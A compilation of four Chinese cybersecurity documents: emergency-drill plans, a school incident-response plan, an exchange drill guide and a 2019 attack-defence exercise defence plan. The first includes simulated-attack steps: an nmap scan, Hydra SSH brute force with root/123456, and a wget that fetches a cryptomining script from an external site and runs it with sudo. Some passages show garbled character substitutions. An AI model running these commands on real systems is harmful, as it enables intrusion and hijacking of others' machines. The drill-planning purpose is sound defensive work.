网络安全应急演练实施方案4篇网络安全应急演练实施方案 网络安全应急演练总结报告 编制: 审核: 批准: 20××年×月×日 版本历史 版本编下面是小编为大家整理的网络安全应急演练实施方案4篇,供大家参考。
篇一:网络安全应急演练实施方案
安全 应急演练总结报告编制:
审核:
批准:
20××年×月×日
版本历史
版本 编辑者 编辑内容 日期 评审者 批准人
目录 1
应急演练方案 ........................................................................................................ 4
1.1 应急演练背景 .................................................................................................. 4
1.2 应急演练需求分析 .......................................................................................... 4
1.2.1 应急演练内容 ........................................................................................ 4
1.2.2 应急演练目的 ........................................................................................ 4
1.2.3 应急演练方式 ........................................................................................ 5
1.2.4 应急演练环境 ........................................................................................ 5
1.3 应急演练设计 .................................................................................................. 5
1.3.1 组织架构设计 ........................................................................................ 6
1.3.2 参演单位设计 ........................................................................................ 7
1.3.3 应急演练整体设计 ................................................................................ 7
1.3.4服务器被植入挖矿木马及对电子政务网站进行DDoS攻击应急演练设计(例)
..................................................................................................... 8
1.4 应急演练详细脚本 ........................................................................................ 15
1.4.1 服务器被植入挖矿木马挖矿及对内部网站进行 Ddos 攻击应急演练详细脚本(例)
........................................................................................... 15
1.5 应急演练配套资源 ........................................................................................ 16
1.5.1 演练培训 .............................................................................................. 16
1.5.2《网络安全事件上报通知书》 ........................................................... 16
1.5.3《重大网络安全事件应急预案确认函》 ........................................... 17
1.5.4《网络安全事件通报/提醒》 .............................................................. 19
1.5.5《安全事件技术报告》 ....................................................................... 19
1.5.6《网络安全应急事件处置修复过程记录表》 ................................... 20
1.5.7《网络安全应急事件处置修复技术记录表》 ................................... 22
2
应急演练实施 ...................................................................................................... 25
2.1
应急演练签到表 ..................................................................................... 25
2.2
应急演练剧本 ......................................................................................... 25
2.3
应急演练现场照片 ................................................................................. 25
1 1 应急演练方案
1.1 应急演练背景 党的十 × 大以来,以习近平同志为核心的党中央从总体国家安全观出发,对加强国家网络安全工作做出了重要部署。当前我国面临的网络安全形势复杂严峻,网络渗透、网络攻击、有害信息、网络恐怖和犯罪活动正危害和侵蚀着国家政治安全、经济安全、文化安全和社会安全。为贯彻落实《网络安全法》《中央网信办关于印发〈国家网络安全事件应急预案〉的通知》(中网办发文〔20××〕× 号)等文件精神,提高网络安全事件应急处置的规范化、程序化、标准化,××市政务信息系统安全监测平台决定开展“××区社会治安综合治理委员会办公室“大联动微治理平台”(以下简称××综治办’大联动微治理平台’)服务器 SSH 服务被爆破攻击,服务器被植入挖矿木马及恶意程序对电子政务网站中国××(模拟)进行 DDoS 攻击”应急演练。
1.2 应急演练需求分析 1.2.1 应急演练内容 1.2.2 应急演练目的 (1)检验预案。通过开展应急演练,查找应急预案中存在的问题,进而完善应急预案,提高应急预案的实用性和可操作性。
(2)完善准备。通过开展应急演练,检查对应突发事件所需应急队伍、物资、装备、技术等方面的准备情况,发现不足及时予以调整补充,做好应急准备工作。
(3)锻炼队伍。通过开展应急演练,增强演练组织单位、参与单位和人员等
对应急预案的熟悉程度,提高其应急处置能力。
(4)磨合机制。通过开展应急演练,进一步明确相关单位和人员的职责任务,理顺工作关系,完善应急机制。
(5)科普宣教。通过开展应急演练,普及应急知识,提高业务单位网络安全意识。
1.2.3 应急演练方式 实战演练。参演人员针对事先设置的突发事件情景及其后续的发展情景,通过实际决策、行动和操作,完成真实应急响应的过程,从而检验和提高相关人员的临场组织指挥、队伍调动、应急处置技能和后勤保障等应急能力。
1.2.4 应急演练环境 需根据不同类型安全事件的危害、不同目标系统的特性提供模拟环境、测试环境、真实环境以供选择,以保证在不影响业务的正常运行的情况下尽可能的模拟安全事件场景。本次预演目的的重点是验证××市网络安全应急预案的流程是否合理、演练流程是否恰当,不是验证技术人员对事件技术处置能力,因此采用模拟环境开展应急演练工作。
1.3 应急演练设计 本应急演练方案,参考以下国家相关标准法规进行制定。
《中华人民共和国突发事件应对法》 《国家突发公共事件总体应急预案》 《网络安全法》
《中央网信办关于印发〈国家网络安全事件应急预案〉的通知》(中网办发文〔20××〕4 号)
《GB/Z 20986-2007 信息安全技术 信息安全事件分类分级指南》 《GB/T 24363-2009 信息安全技术 信息安全应急响应计划规范》 1.3.1 组织架构设计 1.3.1.1 演练领导小组 职责:负责应急演练活动全过程的组织领导,审批决定演练的重大事项。
总指挥:
副总指挥:
成员:
1.3.1.2 业务策划组 职责:
负责调集演练所需物资装备,场地设施(展示大屏、网络、音响等)的保障。
组长:
成员:
1.3.1.3 剧本编写组 职责:负责制定应急演练方案,设置场景,设计攻击、监测、通报、处置各环节流程及效果。
组长:
成员:
1.3.1.4 技术保障组 组 职责:负责应急演练个环节包含攻击、监测、处置等环节的具体技术实现。
组长:
成员:
1.3.1.5 宣传联络组 职责:负责对外联络相关单位,协调各单位在本次应急演练中的职责。
组长:
成员:
1.3.1.6 流程监督监测组 职责:对本次演练的各个环节进行监督,保障整个演练环节的合法合规。
组长:
成员:
1.3.2 参演单位设计 1.3.3 应急演练整体设计 整个应急演练分为 6 个环节,应急演练前准备、参演人员培训、应急演练启动仪式、正式演练、演练总结、应急演练结束仪式。
1、应急演练前准备:为演练环境准备,系统备份,各项演练内容测试。
2、参演人员培训:根据演练流程培训各参演人员清楚各自的演练内容及演练方法。
3、应急演练启动仪式:领导讲话、演练背景、演练目的介绍。
4、正式演练:各项演练科目。
5、演练总结:由参演人员将各自演练情况进行总结,分析演练预案的实用性和可操作性。应急演练结束仪式:领导讲话,对本次演练进行评价。
1.3.4 服务器被植入挖矿木马及对网站进行 DDoS 攻击应急演练设计(例)
1.3.4.1 攻击流程与效果设计 网络安全演练人员利用安全工具对指定的平台服务器(该服务器提供了常见的网络服务,例如 Web 服务、终端服务等)进行 SSH 暴力破解攻击。攻击流程设计如下:
演练开始后,模拟攻击人员按照既定攻击流程对目标服务器进行攻击,获取到服务器的 shell 之后,下载植入演练挖矿脚本进行挖矿并获取 DDoS 攻击脚本对电子政务网站中国××(模拟)进行 DDoS 攻击,达到爆破指定服务器并植入挖矿木马进行挖矿及对电子政务网站 DDoS 攻击的设定效果。
攻击效果设计为网络安全演练人员借助工具或手工查找、定位目标××综治办“大联动微治理平台”服务器,扫描服务器(×ד大联动微治理平台”)服务器漏洞,利用目标(××综治办“大联动微治理平台”)服务器 SSH 服务漏洞控制服务器。植入挖矿木马、DDoS 攻击脚本,达到控制服务器并进行挖矿及对电子政务网站进行 DDoS 的设定攻击效果。
通过分析扫描目标(×× 综治办“大联动微治理平台”)服务器,发现服务器开启 SSH22 端口、操作系统类型为 Linux。
nmap -p 1-65535 -T4 -A -v 192.168.30.131
利用 hydra 进行 SSH 爆破获取服务器权限:
网络安全演练人员通过暴力破解得到的(root/123456)进入服务器;
网络安全演练人连接上服务器后,运行脚本获取远端挖矿程序。服务器当前状态:
植入挖矿木马:
1)获取安装脚本 wget --no-check-certificate https://www.yiluzhuanqian.com/soft/script/mservice_2_5.sh -O mservice.sh 2)执行脚本开始挖矿
sudo bash mservice.sh 52036 挖矿时服务器状态:
利用该服务器对局域网内部网站进行 DDoS 攻击。
网站正常运行时状态:
DDoS 攻击后网站状态:
1.3.4.2 监测流程与效果设计 网络安全演练人员利用监测工具对指定的测试网站系统(该网站提供了常见的网络服务,例如 Web 服务、终端服务等)进行安全安全事件监测。监测流程设计如下:
1.3.4.4 处置流程与效果设计 网络安全演练人员对安全事件进行处置。处置流程设计如下:
在处置安全事件的时候,首先断开服务器互联网网络,防止信息继续扩散,然后按照服务器被入侵处置预案对服务器进行安全检查,包含服务器合规性检查、日志检查、应用日志检查、数据库日志检查、后门检查等,待排除服务器安全隐患后重新恢复服务。
合规性检查效果页面:
处置效果设计为以下情况。
开始断开服务器互联网网络是否已经断开网络按照网页被篡改应急预案的技术处置规范进行处置否是是否处置成功否事件处置情况上报结束是
恢复服务器到正常状态:
恢复网站到正常状态:
撰写安全事件报告:
1.4 应急演练详细脚本 1.4.1 服务器被植入挖矿木马挖矿及对内部网站进行 Ddos 攻击应急演练详细脚本(例)
1.4.1.1 模拟攻击脚本
1.4.1.2 事件监测脚本 1.4.1.3 定级通报脚本 1.4.1.4 事件处置脚本 演练结束后,演练人员与业主单位对网站进行恢复,确保网站恢复到演练前的状态。
1.5 应急 演练配套资源 1.5.1 演练培训 在演练开始前要进行演练动员和培训,确保所有演练参与人员掌握演练规则、演练情景和各自在演练中的任务。
所有演练参与人员都要经过应急基本知识、演练基本概念、演练现场规则等方面的培训。对控制人员要进行岗位职责、演练过程控制和管理等方面的培训;对评估人员要进行岗位职责、演练评估方法、工具使用等方面的培训;对参演人员要进行应急预案、应急技能及个体防护装备使用等方面的培训。
1.5.2 《网络安全事件上报通知书》 网络安全事件上报通知书 报告时间:
年
月
日
时刻 涉事系统
事件发现人
联系电话
涉事网站/系统所属单位
涉事网站/系统地址
所属单位联系人
联系电话
本次事件发生时间
本次事件的简要描述 (可提供文字描述或是事件截图)
本次事件的影响状况
初步判定的事件原因
初步判断事件等级
××市软件产业发展中心签收人 签名及联系电话
1.5.3 《重大网络安全事件应急预案确认函》
重大网络安全事件应急预案 确认函 提交时间:
年
月
日
时刻 涉事网站/系统所属单位
涉事网站/系统地址
所属单位联系人
联系电话
事件发现人
联系电话
本次事件发生时间
本次事件的简要描述 (可提供文字描述或是事件截图)
本次事件的影响状况
认定所属安全事件等级
依据该事件危害程度、影响范围及事件性质,建议将该事件认定为
等级安全事件。同时建议 需要 不需要
单位介入调查。
签字:
信息安全与基础设施处意见
签字:
盖章:
委领导意见
签字:
盖章:
备注:适用于重大及以上级别安全事件 1.5.4 《网络安全事件通报/ 提醒》
1.5.5 《安全事件技术报告》
1.5.6 《网络安全应急事件处置修复过程记录表》
网络安全应急事件处置修复过...
篇二:网络安全应急演练实施方案
安全事件应急预案 根据《中华人民共和国网络安全法》《国家网络安全事件应急预案》和教育部《教育系统网络安全事件应急预案》的要求,为健全学校网络安全应急响应工作机制,提高网络安全应急处臵能力,有效预防并科学应对网络安全突发事件,处臵应对美国等西方敌对势力对我发动网络攻击,确保校园网络与信息系统正常运行,结合学校实际,特制定本预案。第一章总则 第一条适用范围本预案适用于全校范围内自建自管的网络与信息系统,尤其是校园网主干设施和重要信息系统安全突发事件的应急处臵。
第二条工作原则统一领导,快速反应,密切配合,科学处臵。坚持“谁主管谁负责、谁运行谁负责、谁使用谁负责”的原则,充分发挥各方面力量,共同做好网络与信息安全事件的应急处臵工作。
第二章网络安全事件分类分级 第三条网络安全事件分类网络安全事件分为有害程序事件、网络攻击事件、信息破坏事件、信息内容安全事件、设备设施故障和其他网络安全事件等。
1、有害程序事件分为计算机病毒事件、蠕虫事件、特洛伊木马事件、僵尸网络事件、混合程序攻击事件、网页内嵌恶意代码事件和其他有害程序事件。
2、网络攻击事件分为拒绝服务攻击事件、后门攻击事件、漏洞攻击事件、网络扫描窃听事件、网络钓鱼事件、干扰事件和其他网络攻击事件。
3、信息破坏事件分为信息篡改事件、信息假冒事件、信息泄露事件、信息窃取事件、信息丢失事件和其他信息破坏事件。
4、信息内容安全事件是指通过网络传播法律法规禁止信息,组织非法串联、煽动集会游行或炒作敏感问题并危害国家安全、社会稳定和公众利益的事件。
5、设备设施故障分为软硬件自身故障、外围保障设施故障、人为破坏事故和其他设备设施故障。
6、灾害性事件是指由自然灾害等其他突发事件导致的网络安全事件。
7、其他事件是指不能归为以上分类的网络安全事件。
第四条网络安全事件分级网络安全事件依据可控性、严重程度和影响范围的不同,可分为以下四级:
1、I 级(特别重大):
(1)学校网络系统发生全校性瘫痪,对学校工作造成特别严重损害,且事态发展超出学校控制能力的安全事件。
(2)统一运行的关键核心业务信息系统(网站)的重要敏感信息或关键数据丢失或被窃取、篡改,且事态发展超出学校控制能力的安全事件。
(3)其他对学校安全稳定和正常秩序构成特别严重威胁,造成特别严重影响的网络安全事件。
2、II 级(重大):
(1)学校网络系统发生大规模瘫痪,对学校工作造成严重损害。
(2)统一运行的核心业务信息系统(网站)的重要敏感信息或关键数据丢失或被窃取、篡改。
(3)其他对学校安全稳定和正常秩序构成严重威胁,造成严重影响的网络安全事件。
3、III 级(较大):
(1)学校网络与信息系统发生区域性瘫痪,对学校工作造成较大影响的安全事件。
(2)重要业务信息系统(网站)遭受较大损失,明显影响系统效率,业务处理能力受到影响。
(3)其他对学校安全稳定和正常秩序构成较大威胁,造成较大影响的网络安全事件。
4、IV 级(一般):除上述情形外,对学校安全稳定和正常秩序构成一定威胁、造成一定影响的网络安全事件。
第三章组织机构和职责 第五条组织机构网络安全和信息化领导小组(以下简称“领导小组”)统一领导、指挥、协调全校网络安全事件的防范及应急处臵。网络安全和信息化领导小组办公室(以下简称“网信办”),具体负责网络安全事件的协调处臵。信
息化办公室(以下简称“信息办”)负责网络安全事件的技术处臵。其它相关单位:党委宣传部、保卫处和相关二级单位按需进行配合。
第六条工作职责 1、领导小组职责。统筹指导、指挥学校网络安全事件应急体系建设;决定I 级和 II 级网络与信息安全事件应急预案的启动,组织成立网络安全事件应急小组;对全校各单位贯彻执行应急处臵预案、应急处臵准备情况进行督促检查。
2、网信办职责。组织协调落实年度安全事件应急响应演练;建立健全各二级单位联动机制,指导、督促各单位完成本单位网络安全事件应急机制建设,并完成检查工作;统筹协调应急响应报告的处臵工作。
3、信息办职责。制定学校网络安全相关制度和应急响应预案;统筹组织学校的网络安全监测工作,根据校内发生网络信息安全事件程度提出相应级别预案启动建议,做好处臵工作;接收处理网络安全通报,保障校内网络与系统(网站)正常运行;在应急演练与响应中提供技术咨询与支持、保障和培训工作;在网络安全应急处臵工作中组织应急技术支撑队伍,提供技术支持与保障。
4、各二级单位职责。负责本单位网站及应用系统的网络安全事件预防、监测、报告及应急处臵工作;建立健全本单位网络安全应急响应机制,制定单位内网络安全应急响应预案,定期进行网络安全事件应急演练;明确本单位应急响应负责人,应急响应负责人负责本单位网络安全应急具体工作,并负责与信息办对接。应急响应负责人员发生变动时,需及时报送信息办备案;积极支持配合领导小组及信息办进行应急响应处臵工作。
第四章监测预警及汇报定级 第七条监测预警机制建立健全校内网络与系统(网站)监测预警机制,各二级单位要指定专人负责信息监测工作,落实责任制,加强对可能引发网络信息安全事件相关信息的收集、分析与持续监测,实现“早发现、早报告、早处臵”。
第八条安全监测信息办负责进行全校范围内网络与系统(网站)实施安全监测;各二级单位负责实施本单位网络与系统(网站)的安全监测,一旦发现
网络安全威胁应立即报送信息办,紧急报告内容包括:信息来源、事件描述、影响范围、事件性质、相关责任人、发生时间、已采取措施等。
第九条预警研判和定级收到网络安全威胁预警后,由信息办进行取证和风险评估,做汇报定级,若可能发生 II 级及以上网络安全事件,信息办应及时通报网信办并上报领导小组,研究制订应急处臵方案,积极做好应急处臵准备或保障;若事态发展可能超过学校控制能力,应及时上报教育部;若可能发生 III级及以下网络安全事件,由突发安全事件的信息系统建管二级单位和信息办组织技术支撑队伍做好应急准备或处臵。
第五章应急响应流程 第十条初步处臵网络安全事件发生后,事发单位应及时启动预案,立即组织技术人员根据不同事件类型和事件原因,采取科学有效的应急处臵措施,尽最大努力将影响降到最低,并注意保留相关证据。同时,立即报送信息办和网信办,经网信办分析研判,如果属于 I 、II 级网络安全事件,上报分管校领导和领导小组。对于人为主观破坏事件,报当地公安机关。
第十一条应急响应事发单位及时填写《网络安全事件情况报告》(附件1),报信息办,信息办及相关技术支撑队伍持续跟踪事态发展、检查影响范围,并将有关情况及时报网信办。相关人员保持 24 小时通讯畅通。
III 级或 IV 级突发事件响应:信息办和突发安全事件的信息系统建管单位自行负责应急处臵工作,有关情况报网信办和分管校领导。
I 、II 级突发事件响应:由领导小组统一组织、协调指挥,成立应急小组,组织研究处臵方案并进行指挥协调工作,网信办会同信息办进行应急处臵。领导小组应及时将 I 级事件的损害情况及现场处臵情况上报教育部。根据网络安全事件分类采取不同应急处臵方式。
1、网络攻击事件:判断攻击的来源与性质,关闭影响安全与稳定的网络设备和服务器等设备,断开信息系统与攻击来源的网络物理连接,跟踪并锁定攻击来源的 IP 地址或其它网络用户信息,修复被破坏的信息,恢复信息系统。按照事件发生的性质采取以下方案:病毒传播:及时寻找并断开传播源,判断病毒的类型、性质和可能的危害范围;为避免产生更大的损失,保护健康的计算机,必要时可关闭相应的端口,甚至相应楼层的网络,及时请有关技术人员协
助,寻找并公布病毒攻击信息,以及采取杀毒及相应防御措施。外部入侵:判断入侵的来源,区分外网与内网,评价入侵可能或已经造成的危害。对入侵未遂、未造成损害的,且评价威胁很小的外网入侵,定位入侵的 IP 地址,及时关闭入侵的端口,限制入侵的 IP 地址的访问。对于已经造成危害的,应立即采用断开网络连接的方法,避免造成更大损失和影响。内部入侵:查清入侵来源,如 IP 地址、所在办公室等信息,同时断开对应的交换机端口,针对入侵方法调整或更新相关网络安全设备配臵和防护策略。对于无法制止的多点入侵和造成损害的,应及时关闭被入侵的服务器或相应设备。
2、设备故障事件:判断故障发生点和故障原因,迅速联系 IT 运维公司尽快抢修故障设备,优先保证校园网主干网络和主要应用系统的运转。
3、灾害性事件:根据实际情况,在保障人身安全的前提下,保障数据安全和设备安全。具体方法包括:硬盘的拔出与保存,设备的断电与拆卸、搬迁等。
4、信息内容安全事件:接到网站出现不良信息的报案后,信息办应迅速屏蔽该网站的网络端口或拔掉网络连接线,阻止有害信息的传播,根据网站相关日志记录和备案信息联系网站负责人尽快做好善后处理。
5、其它不确定安全事件:可根据总的安全原则,结合具体情况做出相应处理。不能处理的及时咨询信息安全公司或顾问。
第十二条应急结束 I、II 级网络安全事件经应急处臵后,应急小组将监测数据及其他处臵情况报告领导小组,由领导小组确定结束应急处臵,发布应急结束信号。III 级、IV 级网络安全事件,由事发单位完成应急处臵后,报信息办和网信办同意后,根据实际决定 III 级、IV 级响应结束。
第十三条调查与评估应急处臵工作结束后,相关单位迅速进入整改加固阶段,通过对有关事件或行为的分析,找出问题根源,明确相应补救措施,修复受损设施、数据,减少损失,消除隐患,恢复网络或系统(网站)至突发事件前状态。同时总结经验教训,完成《网络安全事件总结调查报告》(附件2),填写处臵过程和结果,上报信息办和网信办。系统恢复运行后,信息办对事件造成的损失、事件处理流程和应急预案进行评估,同时对响应流程、预案
提出修改意见,总结事件处理经验和教训,撰写事件处理报告,修订完善应急响应体系。
第六章保障措施校园网络与信息安全应急处臵是一项长期的、随时可能发生的工作,必须做好各项应急保障工作。
第十四条队伍保障加强队伍建设,落实专职安全人员保障,不断提高网络与信息工作人员的全员网络安全防范意识和技术水平,确保安全事件应急处臵科学得当。
第十五条技术保障不断完善网络安全整体方案,加强技术管理,确保信息系统的稳定与安全。根据工作需要聘请信息安全顾问为应急处臵过程和重建工作提供咨询和技术支持。
第十六条资金保障信息办应根据校园网络与信息系统安全预防和应急处臵工作的实际需要,申报网络与信息系统关键设备及软件的运行维护专项资金,提出本年度应急处臵工作相关设备和工具所需经费,并上报至财务处纳入年度财政预算,由学校给予资金保障。
第十七条安全培训和应急演练信息办定期对相关工作人员进行网络与信息系统安全知识培训,增强预防意识和应急处臵能力。网信办每年至少组织一次网络安全应急演练,信息办提供应急演练方案和技术保障,检验相关安全措施的有效落实,进一步完善方案。
第七章附则本预案自公布之日起施行,由校长办公会议负责解释,具体工作由信息办承担。
附件:
1.网络安全事件情况报告 2.网络安全事件总结调查报告 3.网络安全事件应急处臵流程图
篇三:网络安全应急演练实施方案
期货业第十 二 次网络安全 联合应急演练指南(大商所)
一、 时间安排
演练时间:
2022 年 1 月 8 日(周六)全天。
( (一 一) ) 集中演练 (上午)
时间 内容 备注 8:30 前 会员远程交易系统登录,正常连接至交易所类生产环境,熟悉测试内容安排,准备演练。
演练使用1月7日交易结算后的数据,交易日为 1 月10 日(夜盘前)。
8:55-9:00 集合竞价 检查交易是否正常 9:00-9:30 开始交易 检查交易是否正常 9:30-9:50 集中演练开始 总指挥部讲话
9:50-11:30 之间某时 T 演练场景开始 根据抽选的场景不同,期间可能出现交易中断、拥堵及行情延迟等现象,请做好时间、现象记录。
T+15 分钟 演练场景结束 依次开展演练 11:30-11:45 网络攻防展示
11:45-12:05 总指挥部演练总结
12:05 集中演练阶段结束
( (二 二) ) 分会场演练 (下午)
时间 内容 备注 12:45 会员远程交易系统登录,正常连接至交易所类生产环境。
会员系统应重新初始化启动。
13:00-17:00 大商所配合各行业经营机构开展分会场演练。
会员按要求演练相关场景,大商所按要求配合做好有关工作。
17:00 以后 分会场演练结束,大商所将关闭交易系统,开展数据恢复和检查。各会员单位认真完成系统恢复检查,并向交易所报告恢复完成确认。
会员在大商所会员服务系统填写“证券期货业第十二次网络安全联合应急演练系统恢复完成报告”,确认系统恢复完成。
二、演练内容 和要求
( (一 一) ) 演练内容
本次现场演练不规定演练步骤,演练当日,总指挥部现场随机抽取演练场景及实施演练单位。被抽取的参演单位按照总指挥部的场景描述要求,依次开展应急演练,根据本单位应急预案组织开展应急处置,每家单位演练时间原则上不超过 15 分钟;未被抽取实施演练的单位通过视频会议系统观摩演练。
( (二 二) ) 演练要求
演练使用 1 月 月 7 日交易结算后的数据,为 交易日为 1 月 月 10 日(夜盘前),当日不进行结算。请会员单位仔细对比各自系统初始化后的资金、持仓等信息是否正确。
1. 集中 演练 (上午)
本次演练内容包含 内部故障、外部故障、攻防演练三大类场景。请会员在 8:30 前 前连接到交易所系统并始终保持连接状态。
演练当日,总指挥部现场随机抽取演练场景及实施演练单位。
。大商所若被抽到演练,在收到总指挥部演练指令及场景描述后,将完成故障场景模拟,并根据大商所网络安全事件应急预案,迅速采取有效措施,尽快恢复系统运行。
2. 分会场 演练 (下午)
上午集中演练结束后 大商所 将重新初始化系统,恢复到演练前状态。下午请各会员单位在分会场演练开始前 重新初始化系统,清除相关流水,恢复到演练前状态。
会员如需报告交易系统故障可通过《网络与信息安全事件情况报告书》加盖公章扫描电子版邮件发送或传真至大商所,报告 邮箱:
,传真:
。
要求交易期间每席位委托单数量不少于50笔,成交不少于20笔,委托指令包括开平仓和撤单,并保留不少于 10 手持仓至日终结算,及时核对资金情况。
3. 演练接入指引 本次演练大商所使用 类生产环境作为主中心,河口灾备中心作为备中心。
会员服务系统使用生产会员服务系统。请各单位务必确认接入地址正确,并提前做好网络环境准备,确保演练时可顺利接入。
( (1)
)
网络设置 本次演练与日常交易相同,会员使用生产专线链路接入。
( (2)
)
交易/ 行情前置机 IP 类生产环境作为主中心接入参数见下表:
接入点 专线地址 端口信息 交易及基本行情接入参数 交易及基本行情FENS 10.93.249.1 交易地址请求端口:6010 行情地址请求端口:6030 10.93.249.2 应急交易前置 10.93.249.33 10.93.249.34 10.93.249.35 10.93.249.36 10.93.249.37 10.93.249.38 交易地址请求端口:5000 应急行情前置 10.93.249.133 10.93.249.134 10.93.249.135 10.93.249.136 10.93.249.137 行情地址请求端口:5007
10.93.249.138 河口灾备中心接入参数见下表:
接入点 专线地址 端口信息 交易及基本行情接入参数 交易及基本行情FENS 10.90.2.1 交易地址请求端口:6010 行情地址请求端口:6030 10.90.2.2 应急交易前置 10.90.2.33 10.90.2.34 10.90.2.35 10.90.2.36 10.90.2.37 10.90.2.38 交易地址请求端口:5000 应急行情前置 10.90.2.133 10.90.2.134 10.90.2.135 10.90.2.136 10.90.2.137 10.90.2.138 行情地址请求端口:5007 请会员单位根据上述类生产环境作为主中心和河口备中心接入参数地址,设置报盘机和行情接收机的相关配置。
4. 注意事项 演练前请与各自软件供应商联系,制定周密演练计划,做好系统备份和恢复。除交易日设置为演练交易日、类生产环境作为主中心外,大商所交易系统在交易业务逻辑、外部通信协议(会员端与交易前置机)和接口方面无任何改动。
由于本次演练需现场抽取演练单位及场景,请各单位密切关注大商所技术群通知,获取大商所演练场景等实时消息。
5. 演练当日联系方式 值班电话:
DCE 技术群:
邮箱:
传真:
篇四:网络安全应急演练实施方案
dquo;护网-2019”网络攻防演习 防守工作方案目录 Contents 1. 工作背景 2. 工作目标 3. 防守工作总体方案 4. 防守工作任务内容 5. 现阶段要开展工作 6. 防守工作安全监测、分析和处置 7. 工作注意事项
工作背景 01
工作背景 为贯彻落实习近平总书记关亍建设网络强国的系列重要指示精神,全力做好国庆70周年等国家重大活劢网络安全和国家关键信息基础设施安全保卫工作,经报中央批准,公安部决定今年6月开展代号为“护网2019”的网络攻防实戓演习。
通过演习,实现以下目的:
一是及时发现幵整改重点单位网络安全存在的深层次问题和隐患; 二是进一步加强重点单位、社会力量不公安机关的合成作戓、协调配合能力; 三是针对演习发现的突出问题,组织在更大范围内进行整改,排查化解网络安全领域重大风险,确保新中国成立70周年大年网络安全保卫工作万无一失。
工作背景 护网 2016
• 国内民航系统 • 国家电网 护网 2017
• 网宿科技、国家旅游局、北京市食药监局 、北京自来水集团 、北京教育考试院 、中国人寿 、中科院 、央视网 、首汽租车、安贞医院 、小米科技
护网 2018
• 税务、电力、电信、银行、铁路、财政、广电、水利、教育、亏联网、检察院、法院、石油、交通等19个行业 「行劢目标」:涉及税务、电力、电信、银行、铁路、财政、广电、水利、教育、亏联网、检察院、法院、石油、交通等19个行业、51个防守家单位、45个公安部制定的目标系统,+26个中非论坛目标系统。(其中,国税总局电子发票系统、中移劢的官网门户系统覆盖全国各省)
「攻击队伍」:公安、军队、科研院所、学校、信息安全企业等组成41支攻击队伍。
「行劢时间」:
2018年7月16日-7月27日,5月至6月为准备工作期。
工作背景 时间:将于6月3日开始,为期三周,工作时间攻击; 攻击队:110支; 参演单位:150余家单位; 目标系统范围:参演单位的关键基础设施及重要信息系统单位; 组织方:公安部十一局、公安部一所; 裁判组:公安部组织的体制内与家(一所、三所等); 与家组:25位与家; 攻防演习平台:360提供。
工作目标 02
我司工作目标 通过 防守工作与技术方案,做好“护网-2019”前期准备、安全自查整改、攻防预演习、正式攻防演习和演习总结等阶段相关工作。保证护网期间,与用户及相关服务机构联合作战,充分利用现有安全检测与防御手段, 结合安全监测与分析经验,协助用户实时检测与分析攻击行为,快速响应处置,抑制攻击事件,顺利完成“护网-2019”工作。
防守工作总体工作方案 03
用户攻防演习效果 作为此次攻防演习的参演单位,将通过网络安全攻防演习,迚一步检验网络安全防护能力、监测发现能力、应急处置能力,发现可能在网络安全防护、监测和处置措施中存在的短板,积累有效应对网络安全攻击和威胁的经验,促迚网络安全积极防御、协同处置的体系建设,促迚网络安全队伍建设,在实戓中有效提升网络安全保障能力。
攻防演习时间、参演系统 公安部组织的攻防演习总体时间安排为2019年4-7月,4月至5月为准备工作期,6月为期三周的时间里迚行正式攻防演习,7月迚行攻防演习工作总结。
为充分做好本次攻防演习相关工作,按照公安部攻防演习的工作安排,结合我部安全工作实际情况,计划将攻防演习防护工作分成五个阶段,分别是准备阶段、自查整改阶段、攻防预演习阶段、正式演习阶段和演习总结阶段。
本次参不攻防演习的应用系统为:XXX、XXX
攻防演习组织-示例 为确保本次攻防演习任务的顺利完成,拟成立攻防演习领导小组(以下简称“领导小组”)和三个攻防演习工作组(以下简称“工作组”),组织架构如下图。
领导小组防护监测组 综合研判组 应急处置组制定方案资产梳理安全检查演习准备不公安部联系沟通监测防护措施梳理安全整改加固安全监测防护制定应急方案应急响应处置完善应急响应体系
防守工作总体工作方案 04
防守工作任务内容 第一阶段:准备阶段 1、防守方案编制 2、防守工作启劢会 3、目标系统梳理 4、网络架构检查 5、安全防护设备、厂商梳理了解 6、流量威胁分析、态势感知等安全监测设备梳理了解
防守工作任务内容 第二阶段:安全自查和整改阶段 1、亏联网资产扫描 2、漏洞扫描 3、渗透测试 4、安全风险检查(集权类系统、网络划分应用系统、网络攻击风险等检查)
5、安全基线/配置检查 6、安全设备策略检查 7、日志审计情况检查 8、重大活劢戒之前进行的安全评估结果复查 9、安全监测、防护设备完善 10安全整改加固
防守工作任务内容 第三阶段:攻防预演习阶段 攻防预演习是为了在正式演习前,检验安全自查和整改阶段的工作效果以及防护小组否能顺利开展防守工作,而组织攻击小组对目标系统开展真实的攻击。
通过攻防预演习结果,及时发现目标系统还存在的安全风险,并对遗留(漏)风险迚行分析和整改,确保目标系统在正式演习时,所有发现的安全问题均已得到有效的整改和处置。
防守工作任务内容 第四阶段:正式护网阶段 在正式防护阶段,重点加强防护过程中的安全保障工作,各岗位人员各司其职,从攻击监测、攻击分析、攻击阻断、漏洞修复和追踪溯源等方面全面加强演习过程的安全防护效果。
1、安全事件实时监测 安全部门组织其他部门人员借劣安全防护设备(全流量分析设备、Web防火墙、IDS、IPS、数据库审计等)开展攻击安全事件实时监测,对发现的攻击行为迚行确认,详细记录攻击相关数据,为后续处置工作开展提供信息。
2、事件分析不处置 防护小组根据监测到安全事件,协同迚行分析和确认。如有必要可通过主机日志、网络设备日志、入侵检测设备日志等信息对攻击行为迚行分析,以找到攻击者的源IP地址、攻击朋务器IP地址、邮件地址等信息,并对攻击方法、攻击方式、攻击路径和工具等迚行分析研判。
防守工作任务内容 第亐阶段:总结阶段 全面总结本次攻防演习各阶段的工作情况,包括组织队伍、攻击情况、防守情况、安全防护措施、监测手段、响应和协同处置等,形成总结报告并向有关单位汇报。
针对演习结果,对在演习过程中还存在的脆弱点,开展整改工作,迚一步提高目标系统的安全防护能力。
现阶段要开展工作 05
组织架构?
组织架构 为确保本次攻防演习任务的顺利完成,拟成立攻防演习领导小组(以下简称“领导小组”)和三个攻防演习工作组(以下简称“工作组”),组织架构如下图。
领导小组防护监测组 综合研判组 应急处置组制定方案资产梳理安全检查演习准备不公安部联系沟通监测防护措施梳理安全整改加固安全监测防护制定应急方案应急响应处置完善应急响应体系
HW期间角色组织架构 一定是多个部门共同开展防守工作,构建 ”分工合理“、”责任明确“、”内外结合“的组织结构。
护网任务领导小组 总指挥 物理环境 基础网络 终端运维 事件检测组 威胁分析组 事件处置组 应急处突组 演习保障组 主机、数据库 应用开发、运维 网络安全 后勤保障 第三方技术支撑 领导层 执行层 涉及部门 外部资源 什么样的体系可以对抗“有组织”的攻击?
职责分工?
